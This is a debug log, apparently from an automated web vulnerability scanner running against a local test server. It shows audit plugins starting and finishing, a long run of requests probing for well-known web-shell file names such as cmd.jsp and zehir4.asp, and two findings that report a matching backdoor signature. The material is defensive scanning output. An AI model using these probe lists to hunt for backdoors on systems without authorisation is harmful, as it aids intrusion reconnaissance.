(8e309178b5b40c35, 0.08 sec) [Wed Feb 12 09:36:32 2020 - debug] deserialization.audit(did="L1j6rOTX", uri="http://localhost:9090/learn") [Wed Feb 12 09:36:32 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn" () [Wed Feb 12 09:36:32 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 12. [Wed Feb 12 09:36:32 2020 - debug] GET http://localhost:9090/cmdjsp.jsp returned HTTP code "404" (id=424,from_cache=0,grep=1,rtt=0.16,did=T5ZNtV5K) [Wed Feb 12 09:36:32 2020 - debug] deserialization.audit(did="L1j6rOTX",uri="http://localhost:9090/learn") took 0.02s to run [Wed Feb 12 09:36:33 2020 - debug] os_commanding.audit(did="O4PPzuft", uri="http://localhost:9090/learn") [Wed Feb 12 09:36:33 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn" () [Wed Feb 12 09:36:33 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn" () [Wed Feb 12 09:36:33 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:O4PPzuft) [Wed Feb 12 09:36:33 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn" () [Wed Feb 12 09:36:33 2020 - debug] GET http://localhost:9090/locus.php returned HTTP code "404" (id=428,from_cache=1,grep=1,rtt=0.28,did=ifpf8ibY) [Wed Feb 12 09:36:33 2020 - debug] LOCK http://localhost:9090/ returned HTTP code "404" (id=425,from_cache=0,grep=1,rtt=0.19,did=w4HKYauL) [Wed Feb 12 09:36:33 2020 - debug] GET http://localhost:9090/JspWebshell1.2.jsp returned HTTP code "404" (id=427,from_cache=0,grep=1,rtt=0.20,did=AwB6hf1l) [Wed Feb 12 09:36:33 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 13. [Wed Feb 12 09:36:33 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn" () [Wed Feb 12 09:36:33 2020 - debug] lfi.audit(did="RHEy5TiZ", uri="http://localhost:9090/learn") [Wed Feb 12 09:36:33 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn" () [Wed Feb 12 09:36:33 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:RHEy5TiZ) [Wed Feb 12 09:36:33 2020 - debug] GET http://localhost:9090/h4x.php returned HTTP code "404" (id=426,from_cache=0,grep=1,rtt=0.12,did=7LlmbMjC) [Wed Feb 12 09:36:33 2020 - debug] os_commanding.audit(did="O4PPzuft",uri="http://localhost:9090/learn") took 0.29s to run [Wed Feb 12 09:36:33 2020 - debug] GET http://localhost:9090/0wn3d.php returned HTTP code "404" (id=430,from_cache=0,grep=1,rtt=0.09,did=Dof040zt) [Wed Feb 12 09:36:33 2020 - debug] GET http://localhost:9090/JspWebshell.jspx returned HTTP code "404" (id=432,from_cache=0,grep=1,rtt=0.09,did=1wOMYD46) [Wed Feb 12 09:36:33 2020 - debug] GET http://localhost:9090/site-manifest.gears returned HTTP code "404" (id=433,from_cache=0,grep=1,rtt=0.20,did=H4KFeUf4) [Wed Feb 12 09:36:33 2020 - debug] lfi.audit(did="RHEy5TiZ",uri="http://localhost:9090/learn") took 0.07s to run [Wed Feb 12 09:36:33 2020 - debug] GET http://localhost:9090/jsp-reverse.jspx returned HTTP code "404" (id=431,from_cache=0,grep=1,rtt=0.19,did=IxHTmtjp) [Wed Feb 12 09:36:33 2020 - debug] GET http://localhost:9090/shell.jspx returned HTTP code "404" (id=434,from_cache=0,grep=1,rtt=0.20,did=KubxFyu4) [Wed Feb 12 09:36:33 2020 - debug] GET http://localhost:9090/cod3rzshell.php returned HTTP code "404" (id=437,from_cache=0,grep=1,rtt=0.39,did=bppJp6dc) [Wed Feb 12 09:36:33 2020 - debug] GET http://localhost:9090/cmd_win32.jsp returned HTTP code "404" (id=440,from_cache=0,grep=1,rtt=0.34,did=w321K9MV) [Wed Feb 12 09:36:33 2020 - debug] GET http://localhost:9090/unreal.php returned HTTP code "404" (id=429,from_cache=0,grep=1,rtt=0.10,did=2YSn7M6H) [Wed Feb 12 09:36:33 2020 - debug] sqli.audit(did="CB4Xh7Bf", uri="http://localhost:9090/learn") [Wed Feb 12 09:36:33 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn" () [Wed Feb 12 09:36:33 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:CB4Xh7Bf) [Wed Feb 12 09:36:33 2020 - debug] GET http://localhost:9090/l33t.php returned HTTP code "404" (id=435,from_cache=0,grep=1,rtt=0.32,did=rGtD4Bum) [Wed Feb 12 09:36:33 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 14. [Wed Feb 12 09:36:33 2020 - debug] blind_sqli.audit(did="PnHNu94r", uri="http://localhost:9090/learn") [Wed Feb 12 09:36:33 2020 - debug] sqli.audit(did="CB4Xh7Bf",uri="http://localhost:9090/learn") took 0.06s to run [Wed Feb 12 09:36:33 2020 - debug] GET http://localhost:9090/cmd.jspx returned HTTP code "404" (id=438,from_cache=0,grep=1,rtt=0.46,did=n8JiGtwJ) [Wed Feb 12 09:36:33 2020 - debug] GET http://localhost:9090/servlet/cmdServlet returned HTTP code "404" (id=436,from_cache=0,grep=1,rtt=0.08,did=NDRVZBuV) [Wed Feb 12 09:36:33 2020 - debug] phishing_vector.audit(did="7S1hFivL", uri="http://localhost:9090/learn") [Wed Feb 12 09:36:33 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn" () [Wed Feb 12 09:36:33 2020 - debug] GET http://localhost:9090/simp-worm_sys.p5.php returned HTTP code "404" (id=439,from_cache=0,grep=1,rtt=0.12,did=1keiNQkW) [Wed Feb 12 09:36:33 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 15. [Wed Feb 12 09:36:34 2020 - debug] GET http://localhost:9090/jsback.php returned HTTP code "404" (id=445,from_cache=0,grep=1,rtt=0.17,did=V65KM2qA) [Wed Feb 12 09:36:34 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn" () [Wed Feb 12 09:36:34 2020 - debug] generic.audit(did="SUt01QIA", uri="http://localhost:9090/learn") [Wed Feb 12 09:36:34 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn" () [Wed Feb 12 09:36:34 2020 - debug] GET http://localhost:9090/cmd_win32.jsp returned HTTP code "404" (id=442,from_cache=0,grep=1,rtt=0.32,did=uQ043Y77) [Wed Feb 12 09:36:34 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn" () [Wed Feb 12 09:36:34 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:7S1hFivL) [Wed Feb 12 09:36:34 2020 - debug] GET http://localhost:9090/UpServlet returned HTTP code "404" (id=446,from_cache=0,grep=1,rtt=0.36,did=qPaPZM6i) [Wed Feb 12 09:36:34 2020 - debug] blind_sqli.audit(did="PnHNu94r",uri="http://localhost:9090/learn") took 0.25s to run [Wed Feb 12 09:36:34 2020 - debug] Will increase timeout to 3.30 seconds after HTTP socket error (did:l59WiXpU) [Wed Feb 12 09:36:34 2020 - debug] Updating socket timeout for localhost from 3.00 to 3.30 seconds [Wed Feb 12 09:36:34 2020 - debug] Raising HTTP error "MKDIR" "http://localhost:9090/" failed reason: "No status line received - the server has closed the connection". Error handling was disabled for this request (did:l59WiXpU). [Wed Feb 12 09:36:34 2020 - debug] Finished audit.phishing_vector (did=7S1hFivL) [Wed Feb 12 09:36:34 2020 - debug] phishing_vector.audit(did="7S1hFivL",uri="http://localhost:9090/learn") took 0.15s to run [Wed Feb 12 09:36:34 2020 - debug] format_string.audit(did="1fFO1rVH", uri="http://localhost:9090/learn") [Wed Feb 12 09:36:34 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn" () [Wed Feb 12 09:36:34 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:1fFO1rVH) [Wed Feb 12 09:36:34 2020 - debug] websocket_hijacking.audit(did="fhUQxLle", uri="http://localhost:9090/learn") [Wed Feb 12 09:36:34 2020 - debug] shell_shock.audit(did="QVLGzKv1", uri="http://localhost:9090/learn") [Wed Feb 12 09:36:34 2020 - debug] format_string.audit(did="1fFO1rVH",uri="http://localhost:9090/learn") took 0.05s to run [Wed Feb 12 09:36:34 2020 - debug] GET http://www.bing.com/search?q=@localhost.&FORM=PERE&first=51 returned HTTP code "200" (id=443,from_cache=0,grep=0,rtt=0.80,did=wLwG7Ov2) [Wed Feb 12 09:36:34 2020 - debug] GET http://localhost:9090/cmd.cgi returned HTTP code "404" (id=444,from_cache=0,grep=1,rtt=0.16,did=r56eMCXe) [Wed Feb 12 09:36:34 2020 - debug] GET http://localhost:9090/cmdServlet returned HTTP code "404" (id=441,from_cache=0,grep=1,rtt=0.33,did=gnOHxQKG) [Wed Feb 12 09:36:34 2020 - debug] GET http://localhost:9090/cmd.asp returned HTTP code "404" (id=447,from_cache=0,grep=1,rtt=0.31,did=prF86v5z) [Wed Feb 12 09:36:34 2020 - debug] memcachei.audit(did="OZ0tw0i6", uri="http://localhost:9090/learn") [Wed Feb 12 09:36:34 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn" () [Wed Feb 12 09:36:34 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:OZ0tw0i6) [Wed Feb 12 09:36:34 2020 - debug] memcachei.audit(did="OZ0tw0i6",uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:36:34 2020 - debug] generic.audit(did="SUt01QIA",uri="http://localhost:9090/learn") took 0.33s to run [Wed Feb 12 09:36:34 2020 - debug] un_ssl.audit(did="NoWWjhHi", uri="http://localhost:9090/learn") [Wed Feb 12 09:36:34 2020 - debug] un_ssl.audit(did="NoWWjhHi",uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:36:34 2020 - debug] localhost:9090 connection pool stats (free:48 / in_use:2 / max:50 / total:50) [Wed Feb 12 09:36:34 2020 - debug] Connections with more in use time: (b3e6f2b4bc2d284d, 0.01 sec) (8e309178b5b40c35, 0.00 sec) [Wed Feb 12 09:36:34 2020 - debug] GET http://localhost:9090/fso.asp returned HTTP code "404" (id=449,from_cache=0,grep=1,rtt=0.15,did=QUjmWWGK) [Wed Feb 12 09:36:34 2020 - debug] GET http://localhost:9090/ntdaddy.aspx returned HTTP code "404" (id=450,from_cache=0,grep=1,rtt=0.22,did=K9mFNvkB) [Wed Feb 12 09:36:34 2020 - vulnerability] An HTTP response matching the web backdoor signature "cmd.jsp" was found at: "http://localhost:9090/cmd.jspx"; this could indicate that the server has been compromised. This vulnerability was found in the request with id 438. [Wed Feb 12 09:36:34 2020 - debug] Will increase timeout to 3.63 seconds after HTTP socket error (did:zr8KusXP) [Wed Feb 12 09:36:34 2020 - debug] Updating socket timeout for localhost from 3.30 to 3.63 seconds [Wed Feb 12 09:36:34 2020 - debug] Raising HTTP error "INVALID" "http://localhost:9090/" failed reason: "No status line received - the server has closed the connection". Error handling was disabled for this request (did:zr8KusXP). [Wed Feb 12 09:36:34 2020 - debug] websocket_hijacking.audit(did="fhUQxLle",uri="http://localhost:9090/learn") took 0.37s to run [Wed Feb 12 09:36:34 2020 - debug] VariantDB is returning False because of "seen_exactly_the_same" for "Method: GET | http://localhost:9090/cmd.jspx" [Wed Feb 12 09:36:34 2020 - debug] ldapi.audit(did="TUQR8jjY", uri="http://localhost:9090/learn") [Wed Feb 12 09:36:34 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn" () [Wed Feb 12 09:36:34 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:TUQR8jjY) [Wed Feb 12 09:36:34 2020 - debug] ldapi.audit(did="TUQR8jjY",uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:36:34 2020 - debug] GET http://localhost:9090/cmdasp.asp returned HTTP code "404" (id=448,from_cache=0,grep=1,rtt=0.18,did=7N4Oeihi) [Wed Feb 12 09:36:34 2020 - debug] buffer_overflow.audit(did="6XkUbeCP", uri="http://localhost:9090/learn") [Wed Feb 12 09:36:34 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn" () [Wed Feb 12 09:36:34 2020 - debug] buffer_overflow.audit(did="6XkUbeCP",uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:36:34 2020 - debug] redos.audit(did="urNY93l4", uri="http://localhost:9090/learn") [Wed Feb 12 09:36:34 2020 - debug] GET http://localhost:9090/cmd.mspx returned HTTP code "404" (id=452,from_cache=0,grep=1,rtt=0.32,did=CaAbvZY9) [Wed Feb 12 09:36:34 2020 - debug] GET http://localhost:9090/zehir4.asp returned HTTP code "404" (id=451,from_cache=0,grep=1,rtt=0.32,did=YcBE9aHr) [Wed Feb 12 09:36:34 2020 - debug] global_redirect.audit(did="0u2Yo4k3", uri="http://localhost:9090/learn") [Wed Feb 12 09:36:34 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn" () [Wed Feb 12 09:36:34 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:0u2Yo4k3) [Wed Feb 12 09:36:34 2020 - debug] xpath.audit(did="ZjSusM9G", uri="http://localhost:9090/learn") [Wed Feb 12 09:36:34 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn" () [Wed Feb 12 09:36:34 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:ZjSusM9G) [Wed Feb 12 09:36:34 2020 - debug] xpath.audit(did="ZjSusM9G",uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:36:34 2020 - debug] Will increase timeout to 3.99 seconds after HTTP socket error (did:PEDz7vP4) [Wed Feb 12 09:36:34 2020 - debug] Updating socket timeout for localhost from 3.63 to 3.99 seconds [Wed Feb 12 09:36:34 2020 - debug] Raising HTTP error "UNCHECKOUT" "http://localhost:9090/" failed reason: "No status line received - the server has closed the connection". Error handling was disabled for this request (did:PEDz7vP4). [Wed Feb 12 09:36:34 2020 - debug] cors_origin.audit(did="gieLmh8d", uri="http://localhost:9090/learn") [Wed Feb 12 09:36:34 2020 - debug] GET http://localhost:9090/aspydrv.asp returned HTTP code "404" (id=455,from_cache=0,grep=1,rtt=0.06,did=5Ap24hqR) [Wed Feb 12 09:36:34 2020 - debug] GET http://localhost:9090/JspWebshell1.2.jspx returned HTTP code "404" (id=456,from_cache=0,grep=1,rtt=0.10,did=vF7MA5H9) [Wed Feb 12 09:36:34 2020 - debug] htaccess_methods.audit(did="n3ab8gR8", uri="http://localhost:9090/learn") [Wed Feb 12 09:36:34 2020 - debug] GET http://localhost:9090/site_manifest.gears returned HTTP code "404" (id=457,from_cache=0,grep=1,rtt=0.12,did=dKNT1wBS) [Wed Feb 12 09:36:34 2020 - debug] GET http://localhost:9090/fso.aspx returned HTTP code "404" (id=464,from_cache=0,grep=1,rtt=0.15,did=96inFdoa) [Wed Feb 12 09:36:34 2020 - debug] GET http://localhost:9090/zehir4.mspx returned HTTP code "404" (id=458,from_cache=0,grep=1,rtt=0.13,did=gZ589MHE) [Wed Feb 12 09:36:34 2020 - debug] GET http://localhost:9090/JspWebshell.jsp returned HTTP code "404" (id=462,from_cache=0,grep=1,rtt=0.14,did=hII3uCB9) [Wed Feb 12 09:36:35 2020 - debug] GET http://localhost:9090/fso.mspx returned HTTP code "404" (id=465,from_cache=0,grep=1,rtt=0.08,did=0YxjO48C) [Wed Feb 12 09:36:35 2020 - debug] GET http://localhost:9090/cmd.jsp returned HTTP code "404" (id=454,from_cache=0,grep=1,rtt=0.17,did=R3j0fpzn) [Wed Feb 12 09:36:35 2020 - debug] dav.audit(did="fxWl3s4W", uri="http://localhost:9090/learn") [Wed Feb 12 09:36:35 2020 - debug] GET http://localhost:9090/cmd.pl returned HTTP code "404" (id=461,from_cache=0,grep=1,rtt=0.19,did=r2GBcnF2) [Wed Feb 12 09:36:35 2020 - debug] GET http://localhost:9090/cmd.aspx returned HTTP code "404" (id=453,from_cache=0,grep=1,rtt=0.15,did=s57ROWWC) [Wed Feb 12 09:36:35 2020 - debug] GET http://localhost:9090/CmdServlet returned HTTP code "404" (id=463,from_cache=0,grep=1,rtt=0.08,did=kZhLSn2a) [Wed Feb 12 09:36:35 2020 - debug] GET http://localhost:9090/zehir4.aspx returned HTTP code "404" (id=460,from_cache=0,grep=1,rtt=0.10,did=DEJwDqAd) [Wed Feb 12 09:36:35 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 16. [Wed Feb 12 09:36:35 2020 - debug] Will increase timeout to 4.39 seconds after HTTP socket error (did:wIGfKpwF) [Wed Feb 12 09:36:35 2020 - debug] Updating socket timeout for localhost from 3.99 to 4.39 seconds [Wed Feb 12 09:36:35 2020 - debug] Raising HTTP error "MKWORKSPACE" "http://localhost:9090/" failed reason: "No status line received - the server has closed the connection". Error handling was disabled for this request (did:wIGfKpwF). [Wed Feb 12 09:36:35 2020 - debug] ssi.audit(did="sJkre3Hf", uri="http://localhost:9090/learn") [Wed Feb 12 09:36:35 2020 - debug] dav.audit(did="fxWl3s4W",uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:36:35 2020 - debug] GET http://localhost:9090/browser.jsp returned HTTP code "404" (id=459,from_cache=0,grep=1,rtt=0.11,did=7zPpSrze) [Wed Feb 12 09:36:35 2020 - debug] localhost:9090 connection pool stats (free:43 / in_use:7 / max:50 / total:50) [Wed Feb 12 09:36:35 2020 - debug] Connections with more in use time: (510958b4bb1ade75, 0.18 sec) (60c911515a0e8ec0, 0.18 sec) (ee57bf4e9093aa89, 0.17 sec) (c8b9d551939e41be, 0.17 sec) (c184bfcf8e3861b7, 0.17 sec) [Wed Feb 12 09:36:35 2020 - debug] ria_enumerator.discover(did="6oxXsePs",uri="http://localhost:9090/") took 18.73s to run [Wed Feb 12 09:36:35 2020 - debug] xxe.audit(did="nONoTKC2", uri="http://localhost:9090/learn") [Wed Feb 12 09:36:35 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn" () [Wed Feb 12 09:36:35 2020 - debug] GET http://localhost:9090/shell.jsp returned HTTP code "404" (id=466,from_cache=0,grep=1,rtt=0.11,did=DMiJ6Uyu) [Wed Feb 12 09:36:35 2020 - debug] wordpress_fullpathdisclosure.discover(http://localhost:9090/, did=P20Zanwu) [Wed Feb 12 09:36:35 2020 - debug] [wordpress_fullpathdisclosure] Crawling "http://localhost:9090/" [Wed Feb 12 09:36:35 2020 - debug] eval.audit(did="SvjJM2O8", uri="http://localhost:9090/learn") [Wed Feb 12 09:36:35 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn" () [Wed Feb 12 09:36:35 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:SvjJM2O8) [Wed Feb 12 09:36:35 2020 - debug] xxe.audit(did="nONoTKC2",uri="http://localhost:9090/learn") took 0.11s to run [Wed Feb 12 09:36:35 2020 - debug] GET http://localhost:9090/kshell.aspx returned HTTP code "404" (id=471,from_cache=0,grep=1,rtt=0.20,did=Y1me00ns) [Wed Feb 12 09:36:35 2020 - debug] GET http://localhost:9090/servlet/CmdServlet returned HTTP code "404" (id=469,from_cache=0,grep=1,rtt=0.14,did=bNvDGXqN) [Wed Feb 12 09:36:35 2020 - debug] GET http://localhost:9090/up_win32.jsp returned HTTP code "404" (id=472,from_cache=0,grep=1,rtt=0.23,did=VkPtrpKZ) [Wed Feb 12 09:36:35 2020 - debug] GET http://localhost:9090/cmd.cfm returned HTTP code "404" (id=473,from_cache=0,grep=1,rtt=0.26,did=nkiXHO1G) [Wed Feb 12 09:36:35 2020 - debug] GET http://localhost:9090/learn returned HTTP code "200" (id=468,from_cache=0,grep=1,rtt=0.20,did=gieLmh8d) [Wed Feb 12 09:36:35 2020 - debug] GET http://localhost:9090/shell.aspx returned HTTP code "404" (id=474,from_cache=0,grep=1,rtt=0.12,did=ohk3EvpQ) [Wed Feb 12 09:36:35 2020 - debug] GET http://localhost:9090/learn returned HTTP code "200" (id=470,from_cache=0,grep=1,rtt=0.20,did=QVLGzKv1) [Wed Feb 12 09:36:35 2020 - debug] GET http://localhost:9090/kacak.aspx returned HTTP code "404" (id=477,from_cache=0,grep=1,rtt=0.38,did=BxHUHL5n) [Wed Feb 12 09:36:35 2020 - vulnerability] An HTTP response matching the web backdoor signature "cmd.jsp" was found at: "http://localhost:9090/cmd.jsp"; this could indicate that the server has been compromised. This vulnerability was found in the request with id 454. [Wed Feb 12 09:36:35 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn" () [Wed Feb 12 09:36:35 2020 - debug] New fuzzable request identified: "Method: GET | http://localhost:9090/cmd.jspx" [Wed Feb 12 09:36:35 2020 - information] New URL found by find_backdoors plugin: "http://localhost:9090/cmd.jspx" [Wed Feb 12 09:36:35 2020 - debug] Updating socket timeout for localhost from 4.39 to 3.00 seconds [Wed Feb 12 09:36:35 2020 - debug] rosetta_flash.audit(did="Ov7Kj2S5", uri="http://localhost:9090/learn") [Wed Feb 12 09:36:35 2020 - debug] rosetta_flash.audit(did="Ov7Kj2S5",uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:36:35 2020 - debug] eval.audit(did="SvjJM2O8",uri="http://localhost:9090/learn") took 0.25s to run [Wed Feb 12 09:36:35 2020 - debug] MERGE http://localhost:9090/ returned HTTP code "404" (id=476,from_cache=0,grep=1,rtt=0.27,did=gcBEsu5m) [Wed Feb 12 09:36:35 2020 - debug] xss.audit(did="vpuaxdDC", uri="http://localhost:9090/learn") [Wed Feb 12 09:36:35 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn" () [Wed Feb 12 09:36:35 2020 - debug] xss.audit(did="vpuaxdDC",uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:36:35 2020 - debug] xst.audit(did="TPeeIhQr", uri="http://localhost:9090/learn") [Wed Feb 12 09:36:35 2020 - debug] xst.audit(did="TPeeIhQr",uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:36:35 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn" () [Wed Feb 12 09:36:35 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:sJkre3Hf) [Wed Feb 12 09:36:35 2020 - debug] GET http://localhost:9090/aspydrv.mspx returned HTTP code "404" (id=467,from_cache=0,grep=1,rtt=0.11,did=oDFAYy71) [Wed Feb 12 09:36:35 2020 - debug] GET http://localhost:9090/rhtools.asp returned HTTP code "404" (id=478,from_cache=0,grep=1,rtt=0.04,did=nm3ldA3K) [Wed Feb 12 09:36:35 2020 - debug] GET http://localhost:9090/cmd_win32.jspx returned HTTP code "404" (id=475,from_cache=0,grep=1,rtt=0.11,did=As6hB8vN) [Wed Feb 12 09:36:35 2020 - debug] ssi.audit(did="sJkre3Hf",uri="http://localhost:9090/learn") took 0.78s to run [Wed Feb 12 09:36:35 2020 - debug] ssl_certificate.audit(did="4N37KaTS", uri="http://localhost:9090/learn") [Wed Feb 12 09:36:35 2020 - debug] ssl_certificate.audit(did="4N37KaTS",uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:36:35 2020 - debug] global_redirect.audit(did="0u2Yo4k3",uri="http://localhost:9090/learn") took 1.19s to run [Wed Feb 12 09:36:35 2020 - debug] GET http://localhost:9090/learn returned HTTP code "200" (id=480,from_cache=0,grep=1,rtt=0.16,did=uoavRUdv) [Wed Feb 12 09:36:35 2020 - debug] htaccess_methods.audit(did="n3ab8gR8",uri="http://localhost:9090/learn") took 1.14s to run [Wed Feb 12 09:36:35 2020 - debug] GET http://localhost:9090/cmd-asp-5.1.asp returned HTTP code "404" (id=479,from_cache=0,grep=1,rtt=0.17,did=8CdoXone) [Wed Feb 12 09:36:35 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 294, 'reject-seen-url': 46, 'reject-out-of-scope': 5, 'accept': 55} [Wed Feb 12 09:36:35 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 17. [Wed Feb 12 09:36:35 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn" () [Wed Feb 12 09:36:35 2020 - debug] GET http://localhost:9090/kacak.asp returned HTTP code "404" (id=481,from_cache=0,grep=1,rtt=0.45,did=zydEJspn) [Wed Feb 12 09:36:35 2020 - debug] redos.audit(did="urNY93l4",uri="http://localhost:9090/learn") took 1.43s to run [Wed Feb 12 09:36:35 2020 - debug] preg_replace.audit(did="QpuUtYnP", uri="http://localhost:9090/learn") [Wed Feb 12 09:36:35 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn" () [Wed Feb 12 09:36:35 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:QpuUtYnP) [Wed Feb 12 09:36:35 2020 - debug] mx_injection.audit(did="Vs8f6sxK", uri="http://localhost:9090/learn") [Wed Feb 12 09:36:35 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn" () [Wed Feb 12 09:36:35 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:Vs8f6sxK) [Wed Feb 12 09:36:35 2020 - debug] mx_injection.audit(did="Vs8f6sxK",uri="http://localhost:9090/learn") took 0.01s to run [Wed Feb 12 09:36:35 2020 - debug] response_splitting.audit(did="hlMnMGl1", uri="http://localhost:9090/learn") [Wed Feb 12 09:36:35 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn" () [Wed Feb 12 09:36:35 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:hlMnMGl1) [Wed Feb 12 09:36:35 2020 - debug] UNLOCK http://localhost:9090/ returned HTTP code "404" (id=482,from_cache=0,grep=1,rtt=0.07,did=C3kEB5uV) [Wed Feb 12 09:36:35 2020 - debug] response_splitting.audit(did="hlMnMGl1",uri="http://localhost:9090/learn") took 0.05s to run [Wed Feb 12 09:36:35 2020 - debug] preg_replace.audit(did="QpuUtYnP",uri="http://localhost:9090/learn") took 0.15s to run [Wed Feb 12 09:36:35 2020 - debug] rfd.audit(did="uKnHn1J7", uri="http://localhost:9090/learn") [Wed Feb 12 09:36:35 2020 - debug] URL "http://localhost:9090/learn" is not vulnerable to RFD because response content-type is "text/html" and content-disposition header is missing, response id 419 [Wed Feb 12 09:36:35 2020 - debug] rfd.audit(did="uKnHn1J7",uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:36:35 2020 - debug] localhost:9090 connection pool stats (free:42 / in_use:8 / max:50 / total:50) [Wed Feb 12 09:36:35 2020 - debug] Connections with more in use time: (510958b4bb1ade75, 0.33 sec) (c8b9d551939e41be, 0.23 sec) (860a12f8d23ea2d9, 0.22 sec) (7a65d701500055b3, 0.22 sec) (2209cc403a0c5f20, 0.06 sec) [Wed Feb 12 09:36:35 2020 - debug] GET http://localhost:9090/rhtools.aspx returned HTTP code "404" (id=486,from_cache=0,grep=1,rtt=0.17,did=U44f8ueS) [Wed Feb 12 09:36:35 2020 - debug] GET http://localhost:9090/kshell.asp returned HTTP code "404" (id=485,from_cache=0,grep=1,rtt=0.09,did=mjFFdxVA) [Wed Feb 12 09:36:35 2020 - debug] GET http://localhost:9090/shell.mspx returned HTTP code "404" (id=487,from_cache=0,grep=1,rtt=0.10,did=xSQOYr2S) [Wed Feb 12 09:36:35 2020 - debug] VariantDB is returning False because of "seen_exactly_the_same" for "Method: GET | http://localhost:9090/cmd.jsp" [Wed Feb 12 09:36:35 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 18. [Wed Feb 12 09:36:35 2020 - debug] rfi.audit(did="PZDJadGq", uri="http://localhost:9090/learn") [Wed Feb 12 09:36:35 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn" () [Wed Feb 12 09:36:35 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:PZDJadGq) [Wed Feb 12 09:36:35 2020 - debug] frontpage.audit(did="B8EcaTJy", uri="http://localhost:9090/learn") [Wed Feb 12 09:36:35 2020 - debug] GET http://localhost:9090/jsp-reverse.jsp returned HTTP code "404" (id=490,from_cache=0,grep=1,rtt=0.17,did=pM5zYhOM) [Wed Feb 12 09:36:35 2020 - debug] RFI using local web server for URL: http://localhost:9090/learn [Wed Feb 12 09:36:36 2020 - debug] GET http://www.bing.com/search?q=@localhost.&FORM=PERE&first=61 returned HTTP code "200" (id=484,from_cache=0,grep=0,rtt=0.72,did=ToLkH5pC) [Wed Feb 12 09:36:36 2020 - debug] GET http://localhost:9090/shell.cfm returned HTTP code "404" (id=483,from_cache=0,grep=1,rtt=0.09,did=We6RqMBJ) [Wed Feb 12 09:36:36 2020 - debug] GET http://localhost:9090/shell.nsf returned HTTP code "404" (id=488,from_cache=0,grep=1,rtt=0.15,did=fQnRKhhf) [Wed Feb 12 09:36:36 2020 - debug] frontpage.audit(did="B8EcaTJy",uri="http://localhost:9090/learn") took 0.10s to run [Wed Feb 12 09:36:36 2020 - debug] New fuzzable request identified: "Method: GET | http://localhost:9090/cmd.jsp" [Wed Feb 12 09:36:36 2020 - information] New URL found by find_backdoors plugin: "http://localhost:9090/cmd.jsp" [Wed Feb 12 09:36:36 2020 - debug] GET 